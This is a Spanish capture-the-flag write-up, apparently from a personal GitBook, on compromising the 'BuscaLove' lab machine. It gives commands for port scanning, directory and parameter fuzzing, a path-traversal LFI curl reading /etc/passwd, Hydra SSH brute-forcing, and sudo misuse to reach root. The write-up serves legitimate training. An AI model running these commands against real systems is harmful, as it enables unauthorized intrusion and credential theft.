> For the complete documentation index, see [llms.txt](https://shinki-organization.gitbook.io/dw/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://shinki-organization.gitbook.io/dw/write-ups/quickstart/maquinas-faciles/buscalove-write-up.md).

# BuscaLove write-up

## **Verificamos si tenemos conexión con la máquina víctima**

<figure><img src="/files/n5emCkyxMV68xjXGf2ZF" alt=""><figcaption></figcaption></figure>

## **Escaneo de puertos abiertos de la máquina víctima**

Usamos la herramienta **Nmap** para realizar un escaneo de puertos abiertos de la máquina víctima con el siguiente comando:

```bash
sudo nmap -p- -sCVS --min-rate=5000 -vvv -O -Pn -n 172.18.0.2
```

<figure><img src="/files/MXQOp3zkCExdC1hBczuM" alt=""><figcaption></figcaption></figure>

Esto indica que el puerto 22 (SSH) y el 80 (HTTP) están abiertos. Así que ponemos la IP de la máquina víctima en el navegador, pero no encontramos nada. Por lo tanto, usamos la herramienta **Dirb** para buscar rutas ocultas con el siguiente comando:

```bash
dirb http://172.18.0.2
```

<figure><img src="/files/Vi3DLtDPQBBp4rgXtrOT" alt=""><figcaption></figcaption></figure>

Y encontramos un archivo `http://172.18.0.2/wordpress/index.php` al cual vamos a hacer fuzzing de parámetros con la herramienta **Wfuzz** con el siguiente comando:

```bash
wfuzz -c --hl 40 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://172.18.0.2/wordpress/index.php?FUZZ=../../../../etc/passwd
```

<figure><img src="/files/QjVQ8Tbhf1qvbXIt7jzc" alt=""><figcaption></figcaption></figure>

Esto nos indica que podemos explotar un LFI a traves del parámetro `love`, así que hacemos un curl de la siguiente manera:

```bash
curl http://172.18.0.2/wordpress/index.php?love=../../../../../etc/passwd
```

<figure><img src="/files/EkSoj1gE9YteWbddqT1i" alt=""><figcaption></figcaption></figure>

Esto nos indica dos usuarios `rosa` y `pedro`, así que vamos a hacer una ataque de fuerza bruta con la herramienta **Hydra**, pero primero hacemos un fichero con los dos posibles usuarios de la siguiente manera:

```bash
echo "rosa\npedro" > usuarios.txt && cat usuarios.txt 
```

Y ahora hacemos el ataque de fuerza bruta con este comando:

```bash
hydra -L usuarios.txt -P /home/shinki/Escritorio/rockyou.txt -I -u -V -F ssh://172.18.0.2 
```

<figure><img src="/files/54XrnFJ20A8VP0B8fdz3" alt=""><figcaption></figcaption></figure>

Y encontramos la contraseña del usuario `rosa`, que sería `lovebug`. Así que accedemos a la máquina por el servicio SSH.

## **Intrusión en la máquina víctima**

Una vez dentro ejecutamos el comando `sudo -l` el cual nos indica que podemos ejecutar como cualquier usuario el binario `ls` y `cat` sin necesidad de contraseña. Por lo que haremos ejecutaremos el comando `sudo ls /root` el cual nos muestra que dentro del directorio se encuentra el fichero `secret.txt`, así que le hacemos un cat con el siguiente comando `sudo cat /root/secret.txt`, lo que nos muestra un texto en hexadecimal.

```plaintext
4E 5A 58 57 43 59 33 46 4F 4A 32 47 43 34 54 42 4F 4E 58 58 47 32 49 4B
```

<figure><img src="/files/hYH1E9KqLGtmrThgiLkP" alt=""><figcaption></figcaption></figure>

Que en texto plano sería `NZXWCY3FOJ2GC4TBONXXG2IK`.

<figure><img src="/files/x02KFaoxytOgEo1q6tlG" alt=""><figcaption></figcaption></figure>

Ahora, hay que darse cuenta de que `NZXWCY3FOJ2GC4TBONXXG2IK` esta codificado en base32, por lo que lo decodificamos con el siguiente comando:

```bash
echo "NZXWCY3FOJ2GC4TBONXXG2IK" | base32 -d
```

<figure><img src="/files/36Cc42t7pmeckYd0WT74" alt=""><figcaption></figcaption></figure>

Decodificada la contraseña (`noacertarasosi`), intentamos iniciar sesión en la cuenta del usuario `pedro` con el siguiente comando:

```bash
 su -l pedro
```

<figure><img src="/files/LLZFNuikuOn9dVEGOKgl" alt=""><figcaption></figcaption></figure>

Una vez dentro como el usuario `pedro` ejecutamos de nuevo el comando `sudo -l`, el cual nos indica que podemos ejecutar el binario `env` como cualquier usuario sin necesidad de contraseña, por lo que ejecutamos lo siguiente:

<figure><img src="/files/zFeWNRppkRUorULSih8k" alt=""><figcaption></figcaption></figure>

Y ya habríamos obtenido privilegios root.
